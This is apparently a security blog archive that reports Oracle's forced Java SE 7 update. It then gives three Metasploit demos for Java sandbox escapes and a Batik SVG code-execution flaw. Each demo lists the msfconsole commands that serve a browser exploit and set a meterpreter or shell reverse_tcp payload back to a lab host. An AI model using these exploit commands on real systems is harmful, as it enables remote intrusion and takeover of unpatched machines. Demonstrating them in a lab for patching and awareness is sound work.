Tag Archives: Java

Oracle Push Java SE 7 Update to Uninstall Version 6

Last release of Java SE 6, version 6 update 33(1.6.0_33-b03), was done the 12 Jun 2012 during quarterly Oracle Java CPU (Critical Patch Update). This CPU had fix 14 security vulnerabilities in previous JSE products versions 7, 6, 5 and 4. One of these vulnerabilities was CVE-2012-1723 how is actually used in Blackhole exploit kit.

Metasploit exploitation demonstration of CVE-2012-1723

Since few days you may have see a notification on you system asking you to update Java.

By getting details on the update you will see that Java SE 7 update 5 (1.7_5) is available and by installing this update your previous version of JSE will removed. However, if you wish to keep Java 6 you will need to update from the offline Java installer to the latest version of JSE, how is version 7 update 5. Hu ! What a choice, I have to update to version 7 or to update to version 7.

As you may know Java SE 6 will be no longer supported after November 2012.  The last Java CPU update is planned for 2012, October 12. After November 2012, Oracle will no longer post updates of Java SE 6 to its public download sites. For enterprise customers, who need continued access to critical bug fixes and security fixes as well as general maintenance for Java SE 6 or older versions, long-term support is available through Oracle Java SE Support . But it seem through this forced Java SE update to version 7 that Java SE 6 update 33 was the last one.

So we are encouraging you to plan a mega release on your infrastructures, cause Java SE 6 seem to be officially dead !

CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Timeline :

Public release of the vulnerability the 2012-06-12
First PoC provided by Michael Schierl the 2012-06-13
Metasploit PoC provided the 2012-07-09

PoC provided by :

Stefan Cornellius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java JSE 7 Update 4 and before
Oracle Java JSE 6 Update 32 and before
Oracle Java JSE 5 Update 35 and before
Oracle Java JSE 1.4.2_37 and before

Tested on Windows XP Pro SP3 with :

Oracle JSE 1.6.0_32-b05

Description :

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Squiggle 1.7 SVG Browser Java Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Nicolas Gregoire
Details of the vulnerability provided by Nicolas Gregoire the 2012-05-11
Metasploit PoC provided the 2012-05-17

PoC provided by :

Nicolas Gregoire
sinn3r
juan vazquez

Reference(s) :

http://www.agarri.fr/blog/

Affected version(s) :

Squiggle Browser 1.7
Batik framework 1.7

Tested on Mac OS X 10.7.1 with :

Squiggle Browser 1.7

Description :

This module abuses the SVG support to execute Java Code in the Squiggle Browser included in the Batik framework 1.7 through a crafted svg file referencing a jar file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) It must support at least SVG version 1.1 or newer, (2) It must support Java code and (3) The “Enforce secure scripting” check must be disabled. The module has been tested against Windows and Linux platforms.

Commands :

use exploit/multi/misc/batik_svg_java
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo

Timeline :

Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters the 2011-08-01
Coordinated public release of the vulnerability the 2012-02-14
Details of the vulnerability published by Jeroen Frijters the 2012-02-23
Metasploit PoC provided the 2012-03-29

PoC provided by :

Jeroen Frijters
sinn3r
juan vazquez
egypt

Reference(s) :

CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before

Tested on Windows XP Pro SP3 with :

Oracle Java SE 6 Update 16
Internet Explorer 8

Description :

This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_atomicreferencearray
SET SRVHOST 192.168.178.100
SET PAYLOAD generic/shell_reverse_tcp 
set LHOST 192.168.178.100
exploit